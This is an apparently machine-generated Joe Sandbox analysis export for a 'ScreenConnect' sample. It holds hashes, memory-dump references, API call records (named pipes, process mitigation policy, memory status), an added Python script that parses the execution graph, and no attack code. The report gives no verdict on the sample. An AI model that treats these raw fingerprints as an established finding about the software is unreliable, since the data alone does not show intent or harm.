• Opcode ID: 0abaaa4a772c4a521c701d461562774ee7de9d5ff3cf74b6bf3562b3af3be8c7
• Instruction ID: 4dce00c83ae25839bb442ef51ca5250310b87cd7f3af03eba3f599c1d23c8b08
• Opcode Fuzzy Hash: 0abaaa4a772c4a521c701d461562774ee7de9d5ff3cf74b6bf3562b3af3be8c7
• Instruction Fuzzy Hash: 95E1C131E1CA8B4FEB9AEF6896917A53BD1EF58301F144079D4CDC7292DD69F8428B40
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 748dd6e860afb8a02319cd3038408175489af17504b681ea197c7f5b5799fea4
• Instruction ID: e9be1490d6333f18ecb038e828625f3c8a70ec4b4af07a7db709b718a45ff5d7
• Opcode Fuzzy Hash: 748dd6e860afb8a02319cd3038408175489af17504b681ea197c7f5b5799fea4
• Instruction Fuzzy Hash: A5B13732E0C9870FEB5ADF289A429B57FD0EF95351B144579C48EC7583ED1AF8068B81
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 144f3405507b57dc90538f80f16516a6ae384777a0a356f2687260eea8bb7e99
• Instruction ID: 0fd752990c381cd0879c67a0729fd3e987d0cea57fbd3dbf06ab4cf9c176653d
• Opcode Fuzzy Hash: 144f3405507b57dc90538f80f16516a6ae384777a0a356f2687260eea8bb7e99
• Instruction Fuzzy Hash: F071C532E1C9475BEB5AEF148A429B57BD0FF65341B504539C48FC3582EE2AF9068B81
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d13030b3705821dfe2819637e4a5371adddc5bde7d7fba1682e0891d5609b7c9
• Instruction ID: ea6a1da7359a88311bf833be89012215ce19e601c2c4c2252828f30e372d1bd5
• Opcode Fuzzy Hash: d13030b3705821dfe2819637e4a5371adddc5bde7d7fba1682e0891d5609b7c9
• Instruction Fuzzy Hash: 54711270A19A5B8FEBA9EF58C6917A537D1FF58302F504078D4CEC7295DDA5F8028B40
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fdb4f6fceed4949818c27918924ac73a2812890ddb3540ad18e1f6e3d22479b
• Instruction ID: dffa4a3db688f050328f4c7704b6437fe352921d7031843a087fb8d45f2bedeb
• Opcode Fuzzy Hash: 9fdb4f6fceed4949818c27918924ac73a2812890ddb3540ad18e1f6e3d22479b
• Instruction Fuzzy Hash: F771D476E0C98B4FEB99DF289555BA57BD1FF69300B0441B8C48DDB187CA66F806CB80
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bf60981480695864a3fca90fa326581b521c1f8db9a3070aff769b768ce88baa
• Instruction ID: 1d8aee2841480eedb70d36ad679a75dca16c3db3919c292adb8489b321f5dd57
• Opcode Fuzzy Hash: bf60981480695864a3fca90fa326581b521c1f8db9a3070aff769b768ce88baa
• Instruction Fuzzy Hash: 9D418A22D0E7C70FE7578B355E255A03FA0AF5325170E41EBC4CADB0E3D95E680A8B62
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 13c2d2e9793606a463bc6758f09d8948022f5658b0270223760f7fb27ff7c078
• Instruction ID: 84203206f6504c42c65c8b973401e3adc13dc9e4fab5f75671b2ae85bf1599ee
• Opcode Fuzzy Hash: 13c2d2e9793606a463bc6758f09d8948022f5658b0270223760f7fb27ff7c078
• Instruction Fuzzy Hash: 0D412B32E0C9878BE7A2DF19E9541E97F91FF9C305F440079D18DC7292DEA5B8068B44
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3ff92bd787b4fc520d8c17cfe92999e50a2d9cffbe51a633ecdbcc389c411c4
• Instruction ID: 574fa7368915548d11a403b9be023766f31c2ea03bff7f42f9269dab3819b437
• Opcode Fuzzy Hash: e3ff92bd787b4fc520d8c17cfe92999e50a2d9cffbe51a633ecdbcc389c411c4
• Instruction Fuzzy Hash: 8C41B734A08A4B4FDADDEF18C1957B577D2FF98305B6045B8C059CB68ACA75F842DB80
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 003f55573cdca85f1f6bd4930ad848b6b9a61fda2e7b3bd8bb334df8ec17d22f
• Instruction ID: baf6e2f4c100eb0a35b29164b4c0456f2e262316537de9c14e0edcc3dcc4ce23
• Opcode Fuzzy Hash: 003f55573cdca85f1f6bd4930ad848b6b9a61fda2e7b3bd8bb334df8ec17d22f
• Instruction Fuzzy Hash: 1D41CB32E2C98B4FE75AAF1895417B47B90EB94345F50C07DC48EC6087ED69F8868B44
Memory Dump Source
• Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 51ca51ae473cffc1ee4b14e4744529ccae15d44bdacc5457ed2e99c1a8ee0b67
• Instruction ID: e196a95b51540c376d8391e29672e03179fe316125bf585ffe296d8470384159
• Opcode Fuzzy Hash: 51ca51ae473cffc1ee4b14e4744529ccae15d44bdacc5457ed2e99c1a8ee0b67
• Instruction Fuzzy Hash: 0A31FE33E0D9DB4BDBA7DF586A212F83F90EF49311F0401A6E44DD7292DE5AA8018746
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cdf20e2a94b79872d719d02a6278d290b019203e2c9dfd88d48cbf91bc094d31
                                                                                                                                          • Instruction ID: 31ad954d81685e56e0416d238ac936fbc54efb0f2db968633d5edc72a4741f89
                                                                                                                                          • Opcode Fuzzy Hash: cdf20e2a94b79872d719d02a6278d290b019203e2c9dfd88d48cbf91bc094d31
                                                                                                                                          • Instruction Fuzzy Hash: F831D536E0E6971FD706FB2CE9A64D93F50DF42228B0C00B3D4D9DA0A3EA1634498A91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1b6517bb6555feba82aba4c41d960f4b710762463ca99494e04d2ad76b179304
                                                                                                                                          • Instruction ID: f85cd63a367def687ff1c43dd18ac20540ba37b973d04963f1e79fee9c699e20
                                                                                                                                          • Opcode Fuzzy Hash: 1b6517bb6555feba82aba4c41d960f4b710762463ca99494e04d2ad76b179304
                                                                                                                                          • Instruction Fuzzy Hash: AC11E476D0CA8B8FEF82DF695D642A97FA0FF59300F0400ADD0C9D7192DA61A4418B01
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: cfaaa04e73e42d46f84e260eb81bd4d1bcd580b27c7e84f9d45da8779a63dadf
                                                                                                                                          • Instruction ID: f762e38963a4cf213c92c9e7775ebfb1ca0a4c7f2c5dd4061ccc26dae603b7f7
                                                                                                                                          • Opcode Fuzzy Hash: cfaaa04e73e42d46f84e260eb81bd4d1bcd580b27c7e84f9d45da8779a63dadf
                                                                                                                                          • Instruction Fuzzy Hash: AC11A271B08A8B8FDB89DF18C554A6577D1FFA8705B14007DD44ED7282CE25F802CB40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8c71203dc4c7e81e65830c2f863b709fcd7f8a5590bdbbd5517ca608fcb598f2
                                                                                                                                          • Instruction ID: fe8300d3cd1262b668e8797fca5f67b914f158209135d955c07b703813876734
                                                                                                                                          • Opcode Fuzzy Hash: 8c71203dc4c7e81e65830c2f863b709fcd7f8a5590bdbbd5517ca608fcb598f2
                                                                                                                                          • Instruction Fuzzy Hash: C8116031E189874FDB89DF18C551B657BA1FF68300B0441B8C88EDB287CE69F8068B80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e40855802dd96e1635fdf82891de442b2f58159f1a70af160312cfb4df6ce2b5
                                                                                                                                          • Instruction ID: 5c3d746d86a72200c5e6aee474e3d8f2a9852c8573ed3c482bfeca8caa6e7bc3
                                                                                                                                          • Opcode Fuzzy Hash: e40855802dd96e1635fdf82891de442b2f58159f1a70af160312cfb4df6ce2b5
                                                                                                                                          • Instruction Fuzzy Hash: 4711C411D0DBC30EF766D72886A03746AE19F81341F1941BAC489C65D6DD9EAC818B41
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84920c8909ad72a5274414a5006f176990483f12d14625605a6279fa4dcc2b0c
                                                                                                                                          • Instruction ID: 293852ccd0c0f8c15e640d007e34a50b8030642bc16a5f62c424ea19517aa67d
                                                                                                                                          • Opcode Fuzzy Hash: 84920c8909ad72a5274414a5006f176990483f12d14625605a6279fa4dcc2b0c
                                                                                                                                          • Instruction Fuzzy Hash: F9114271A189874FDB89DF18C555B557BA1FF68704B0441BCC48EDB287CE79F8068B80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 18716263a803e76fbf31a8c64b332b33e46f331af8b8ad038cd62eec1987dd50
                                                                                                                                          • Instruction ID: 50fdfc7a7e26f3491180cee1d20aca8837d9cbbf7b043fd04dbdb202d45b6eb2
                                                                                                                                          • Opcode Fuzzy Hash: 18716263a803e76fbf31a8c64b332b33e46f331af8b8ad038cd62eec1987dd50
                                                                                                                                          • Instruction Fuzzy Hash: 3701FC31A0EACA0FD796DF6D6C991B03FE1EF9B21630901E7E4C9C7293D9569C418341
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0ea8e0ceb00c6c6fa7b9d2f732dc06799dee43fab11657fdea5dd7541f829457
                                                                                                                                          • Instruction ID: 90790a4d6f824dbbd330287fde3e3b2a0346783d6fba3c0eb5fdbd8055c1fbab
                                                                                                                                          • Opcode Fuzzy Hash: 0ea8e0ceb00c6c6fa7b9d2f732dc06799dee43fab11657fdea5dd7541f829457
                                                                                                                                          • Instruction Fuzzy Hash: F6F08C3180D6889FCB42DF68D4558D5BF70EE06320B0501C7E089CB462E6219A58CB82
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 65b8d75488b989e7c3d0a78b398c4d5c0544c9f8cfa60a5f2b5cec74ef91c1c6
                                                                                                                                          • Instruction ID: 0215d7939ef029e3d1d30e6a0eccfee36943486d0cda20fa823feb49343e0653
                                                                                                                                          • Opcode Fuzzy Hash: 65b8d75488b989e7c3d0a78b398c4d5c0544c9f8cfa60a5f2b5cec74ef91c1c6
                                                                                                                                          • Instruction Fuzzy Hash: 46E0DF6150F7D54FDB53DB7888A88E03FA0EE1722030901EBD4C1CF0B3E5198A89CB92
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 661f9896a2f128227adf3d0c6e276f88bda83be93cd723ce8b87b2f23cad71c3
                                                                                                                                          • Instruction ID: 69cf8ee4204a5bcb522e8d83a6fc2e7543bd645b19b46892007802ac317c82c4
                                                                                                                                          • Opcode Fuzzy Hash: 661f9896a2f128227adf3d0c6e276f88bda83be93cd723ce8b87b2f23cad71c3
                                                                                                                                          • Instruction Fuzzy Hash: 67E0C225E0E68302FB6DEA357AE13B968D59F05312F0981BAE40EC08C5DDADEC808991
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 378e885403bf41ceec44de977a44c209caf6163a43d74d5c6f65d2338a41ab80
                                                                                                                                          • Instruction ID: b9cd962b0b487899a84524c3d7372f07a1dd828dd3ea2d30e353a65dee3c9c83
                                                                                                                                          • Opcode Fuzzy Hash: 378e885403bf41ceec44de977a44c209caf6163a43d74d5c6f65d2338a41ab80
                                                                                                                                          • Instruction Fuzzy Hash: 34D0C912F9C89B0BA9D9EE4D75822A416C2D7D869178410A5E54DC2249DC49BC830B80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000009.00000002.2357899292.00007FF9CC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff9cc6c0000_ScreenConnect.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d60a0b02d71db1a5b49541be4f305b8d04ae9723bce60791be8b8def1bdcf0c7
                                                                                                                                          • Instruction ID: c6ebe8fb70c3ee34fc8671c8c24f7950f72b2ee7e3baf8fbc57d0c0d3138ffbd
                                                                                                                                          • Opcode Fuzzy Hash: d60a0b02d71db1a5b49541be4f305b8d04ae9723bce60791be8b8def1bdcf0c7
                                                                                                                                          • Instruction Fuzzy Hash: FAC09B10F195C746F545EF24555177D15526F88601F504435F44DC11C7CD7CF5015D45

Execution Graph

Execution Coverage: 12.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 16
Total number of Limit Nodes: 2
execution_graph (16 nodes, 12 edges; a node is "id address [API]", an edge is "id->id"), listed by call chain:
  15363 7ff9cc3c8014 -> 15365 7ff9cc3c801d -> 15364 7ff9cc3c8001
  15365 7ff9cc3c801d -> 15366 7ff9cc3c80f6 SetProcessMitigationPolicy -> 15367 7ff9cc3c8152
  15354 7ff9cc3c3642 -> 15355 7ff9cc3e64e0 CreateNamedPipeW -> 15357 7ff9cc3e6613
  15368 7ff9cc3c3662 -> 15369 7ff9cc3e6a80 ConnectNamedPipe -> 15371 7ff9cc3e6b32
  15358 7ff9cc6d9114 -> 15359 7ff9cc6d911d -> 15360 7ff9cc6d92d0 GlobalMemoryStatusEx -> 15361 7ff9cc6d92e5
  15359 7ff9cc6d911d -> 15362 7ff9cc6d9212
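Joe Sandbox exports the execution graph as one flattened token stream in which node definitions ("id address", optionally followed by the API the node calls) and edges ("id->id") are interleaved. The following Python is an added example, not Joe Sandbox code or part of this report's tooling: it tokenises that stream, rebuilds the graph, checks the node and edge counts against the report header, and lists which API each root function reaches. The token rules are inferred from the dump on this page and are an assumption, since the export format is not documented here; the input is the execution_graph line from this report embedded verbatim as a constant.

```python
"""Rebuild a Joe Sandbox execution_graph from its flattened text export.

Added example; not Joe Sandbox code. Token rules (assumption, inferred
from the dump on this page): a node is "<id> <hex-address> [ApiName]",
an edge is "<id>-><id>", and the stream starts with "execution_graph".
"""
import re
from collections import defaultdict

# Constructed input: the execution_graph line from this report, verbatim.
EXECUTION_GRAPH = (
    "execution_graph 15363 7ff9cc3c8014 15365 7ff9cc3c801d 15363->15365 "
    "15364 7ff9cc3c8001 15365->15364 15366 7ff9cc3c80f6 "
    "SetProcessMitigationPolicy 15365->15366 15367 7ff9cc3c8152 "
    "15366->15367 15354 7ff9cc3c3642 15355 7ff9cc3e64e0 CreateNamedPipeW "
    "15354->15355 15357 7ff9cc3e6613 15355->15357 15368 7ff9cc3c3662 "
    "15369 7ff9cc3e6a80 ConnectNamedPipe 15368->15369 15371 7ff9cc3e6b32 "
    "15369->15371 15358 7ff9cc6d9114 15359 7ff9cc6d911d 15358->15359 "
    "15360 7ff9cc6d92d0 GlobalMemoryStatusEx 15359->15360 15362 "
    "7ff9cc6d9212 15359->15362 15361 7ff9cc6d92e5 15360->15361"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{6,16}$")  # lowercase hex, as in the export


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, api or None),
    edges is a list of (src_id, dst_id). Raises on malformed input."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes, edges = {}, []
    i = 0
    while i < len(tokens):
        m = EDGE_RE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if not (ID_RE.match(tokens[i]) and i + 1 < len(tokens)
                and ADDR_RE.match(tokens[i + 1])):
            raise ValueError(f"unexpected token {tokens[i]!r} at {i}")
        node_id, addr = int(tokens[i]), int(tokens[i + 1], 16)
        i += 2
        api = None
        # An optional API name follows the address; it is recognised by
        # being neither an id, an address nor an edge.
        if i < len(tokens) and not (ID_RE.match(tokens[i])
                                    or ADDR_RE.match(tokens[i])
                                    or EDGE_RE.match(tokens[i])):
            api, i = tokens[i], i + 1
        nodes[node_id] = (addr, api)
    for a, b in edges:
        if a not in nodes or b not in nodes:
            raise ValueError(f"edge {a}->{b} references an undefined node")
    return nodes, edges


def api_reach(nodes, edges):
    """Map each root (node with no incoming edge) to the sorted list of
    (call-site address, API) pairs reachable from it."""
    succ, has_pred = defaultdict(list), set()
    for a, b in edges:
        succ[a].append(b)
        has_pred.add(b)
    reach = {}
    for root in nodes:
        if root in has_pred:
            continue
        seen, stack, apis = set(), [root], []
        while stack:
            n = stack.pop()
            if n in seen:
                continue
            seen.add(n)
            addr, api = nodes[n]
            if api:
                apis.append((addr, api))
            stack.extend(succ[n])
        reach[nodes[root][0]] = sorted(apis)
    return reach


def summarize(text):
    """{root address as hex string: [API names reachable from it]}."""
    nodes, edges = parse_execution_graph(text)
    return {f"{addr:x}": [api for _, api in apis]
            for addr, apis in api_reach(nodes, edges).items()}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(EXECUTION_GRAPH)
    print(f"{len(nodes)} nodes, {len(edges)} edges")  # compare with header
    for root, apis in sorted(summarize(EXECUTION_GRAPH).items()):
        print(root, "->", ", ".join(apis) or "(no API)")
```

The node count recovered from the stream should equal the "Total number of Nodes" in the report header; a mismatch means the export was truncated or the token rules above do not hold for that report. The per-root summary is the useful output for triage: it shows each executed function with the API it ends in, which is how one notices, for instance, that the 7ff9cc6d9114 function exists to call GlobalMemoryStatusEx.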

Control-flow Graph

control_flow_graph for the function at 7ff9cc6d9114 (basic blocks numbered 473 to 539, covering 7ff9cc6d9114 to 7ff9cc6d9312). The only block containing an API call is 502 (7ff9cc6d92d0-7ff9cc6d92e3, GlobalMemoryStatusEx), entered from block 493 (7ff9cc6d92b9-7ff9cc6d92cf); it continues to 503 (7ff9cc6d92e5) or directly to 504 (7ff9cc6d92eb-7ff9cc6d9312), the function's final block. The Executed / Not Executed colouring of the rendered graph and the full block-to-block edge list are not reproduced in this text export.
APIs
GlobalMemoryStatusEx (block 7ff9cc6d92d0-7ff9cc6d92e3)
Memory Dump Source
• Source File: 0000000B.00000002.1183261422.00007FF9CC6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC6D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff9cc6d0000_ScreenConnect.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
                                                                                                                                          • Opcode ID: 773f7c370e29bc9cc310128ac77e6faee37dd6e035a9bd6bd7d248ba741a674d
                                                                                                                                          • Instruction ID: a5f0778e90d145999c9f87dc1e69485807afe9eba64c94a022d1f42d8f732815
                                                                                                                                          • Opcode Fuzzy Hash: 773f7c370e29bc9cc310128ac77e6faee37dd6e035a9bd6bd7d248ba741a674d
                                                                                                                                          • Instruction Fuzzy Hash: D481D331D0D6CB4FF766CA688A157A97FE0FF56320F0441BAD08EC7592DE98680A8B41

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0
• Opcode ID: c99db4f488f5d5cfb2cb338f0e00abf5b0070f8eb995c5f3596520eae2b64e57
• Instruction ID: 2b9aabbee0cc1c5be32ee5f51966c53ddeedbfd8688c745e4658b35eb5b14f75
• Opcode Fuzzy Hash: c99db4f488f5d5cfb2cb338f0e00abf5b0070f8eb995c5f3596520eae2b64e57
• Instruction Fuzzy Hash: 5C511631D1C7994FDB18AFA8A8465F97BE0EF56321F04027FE489C3152DA64B8468B92

Control-flow Graph

Control-flow graph (rendered image; recoverable content): basic blocks 7ff9cc3c3642-7ff9cc3e664c, with the API call CreateNamedPipeW in block 7ff9cc3e6554-7ff9cc3e6611.
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
Similarity
• API ID: CreateNamedPipe
• String ID:
• API String ID: 2489174969-0
• Opcode ID: 779f5dfaffc52fd1557ad29f0560dcf1108283d8ecad60161bf4e46dbbff86ac
• Instruction ID: 4968349ceb4da80fc3f2163c62f9d7f53813bc020cf559ce2bfc07b855c63f1b
• Opcode Fuzzy Hash: 779f5dfaffc52fd1557ad29f0560dcf1108283d8ecad60161bf4e46dbbff86ac
• Instruction Fuzzy Hash: DB518071918A5C8FDB68DF5C9845BE9BBE0FB59710F0442AEE04DE3251CB70A8458BC1

Control-flow Graph

Control-flow graph (rendered image; recoverable content): basic blocks 7ff9cc3c3662-7ff9cc3e6b80, with the API call ConnectNamedPipe in block 7ff9cc3c3662-7ff9cc3e6b30 and a call to 7ff9cc3e6b81 from block 7ff9cc3e6b38-7ff9cc3e6b80.
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
Similarity
• API ID: ConnectNamedPipe
• String ID:
• API String ID: 2191148154-0
• Opcode ID: 5783de51c4a8784802bcb6eb297774a572ce5f4de26d7abb527f992830f6a86b
• Instruction ID: 28dda5a4b74c0eef8dc487b5c4e97a7039149b27d2c7cb48a8cdb5ab73d420f0
• Opcode Fuzzy Hash: 5783de51c4a8784802bcb6eb297774a572ce5f4de26d7abb527f992830f6a86b
• Instruction Fuzzy Hash: 47318D70E08A1D8FDB58EF98D849BEDB7F0FBA9311F00826AD04DD7255DB70A8458B81

Control-flow Graph

Control-flow graph (rendered image; recoverable content): basic blocks 7ff9cc3c3aa2-7ff9cc3c8187, with the API call SetProcessMitigationPolicy in block 7ff9cc3c80f6-7ff9cc3c8150.
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1177310692.00007FF9CC3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9CC3C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff9cc3c0000_ScreenConnect.jbxd
Similarity
• API ID: MitigationPolicyProcess
• String ID:
• API String ID: 1088084561-0
• Opcode ID: 7c6a2cee19b8e8ace549b9bd8ea63e6d7efa8bbb72d17c3b1e0fb1e20e534ee8
• Instruction ID: 885f63ccd03a99bc2a7d542e4ef6f8e4c8c315d7c5bbe3f1fbd512214b8c1b70
